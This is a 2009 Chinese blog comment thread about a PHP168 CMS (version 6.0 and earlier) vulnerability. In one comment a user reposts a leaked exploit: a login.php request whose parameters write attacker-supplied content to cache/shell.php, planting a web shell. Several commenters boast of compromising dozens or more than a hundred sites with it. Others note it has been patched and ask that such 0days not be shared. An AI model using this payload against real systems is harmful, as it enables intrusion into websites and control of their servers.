PHP168 6.0及以下版本漏洞

电脑报陈邓新 | 2009-09-09 15:10 | #

阿鬼，你爆出这个，真的是哎！我好不容易求到的，本来准备这期上，结果版面的原因，要半个月后上。我的选题呀，55555555555555555！

回复该留言
- 鬼仔 | 2009-09-09 15:34 | #
  
  这个两天就有人发了
  而且马俊那里有篇8月份发的加密日志就是这个，昨天马俊把那个加密日志密码发了出来
  那篇加密日志的地址在这里。
  内容：
  
  php168的0day
  惘然兄弟给的
  拿了个xx的0day和他换的呵呵
  公布出来吧
  如果你有这个命看到
  login.php
  
  login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=
  
  写到：cache/shell.php ，
  
  暂时不做漏洞分析
  
  回复该留言
电脑报陈邓新 | 2009-09-09 16:39 | #

这个漏洞出来好几个月了，得到它们不容易呀！5555555，下下周的稿子，我也要改改说法，全都弄好了，5555555555.哎！！

回复该留言
电脑报陈邓新 | 2009-09-09 16:40 | #

还好，这个东东还是可以说，流传的范围不会很广，我们要文章中点明时间。

回复该留言
YoCo Smart | 2009-09-09 17:13 | #

鬼哥，我跟你说的那个编辑，就是楼上那个……
他说他搞到四个了，不过我的一个朋友说他搞死了一片了，汗颜

回复该留言
haok | 2009-09-10 00:15 | #

我已经搞了一百多了

回复该留言
evil86 | 2009-09-10 14:28 | #

这个是flyh4t发现的马军这个鸡巴整天偷东西

回复该留言
惘然 | 2009-09-10 20:43 | #

这个没什么大用，我都没拿它来打站..朋友写了个利用工具。。全自动的不知道被我丢哪了。。

漏洞是我追一个V6版本漏洞时，当时我知道朋友手里有，都不方便给我，后来找了几个被日过的PHP168程序追到的。。。

PHP168还有很多个没被公布出来的洞。。。

回复该留言
sky | 2009-09-11 09:41 | #

这个漏洞已经被php168官方修补了：
http://bbs.php168.com/read-bbs-tid-263585.html

回复该留言
sExYboy | 2009-09-15 12:40 | #

貌似很久没文章了..搞篇科普嘛

回复该留言
电脑报陈邓新 | 2009-09-15 14:10 | #

是flyh4t发现？不是深灰色？

回复该留言
坏人咖啡 | 2009-09-15 14:39 | #

这个漏洞很早了，早就在流传了！

回复该留言
Inet.sec | 2009-09-16 13:50 | #

鬼仔哥，你好，好久没来了，你还是那么的勤快
我已经做好鬼仔哥的链接，希望鬼仔哥给个链接
Inet.sec ‘Sblog http://hi.baidu.com/inetsec

谢谢
by INet.sec

回复该留言
GFS | 2009-09-16 14:47 | #

现在漏洞被填补了.

回复该留言
骨头 | 2009-09-18 00:32 | #

不玩PHP168

回复该留言
和尚 | 2009-09-18 10:23 | #

楼上全是大牛 ··

回复该留言
xx | 2009-09-18 11:49 | #

手上有0day的哥们别再公布出来了 OK不？自己留着用得了

回复该留言
1 | 2009-09-21 14:45 | #

厉害我来学习下

回复该留言
Ech0 | 2009-10-05 08:54 | #

哈哈` `楼上都大牛

唉0day还是不要公布好“

不然受害者一大把哦`

回复该留言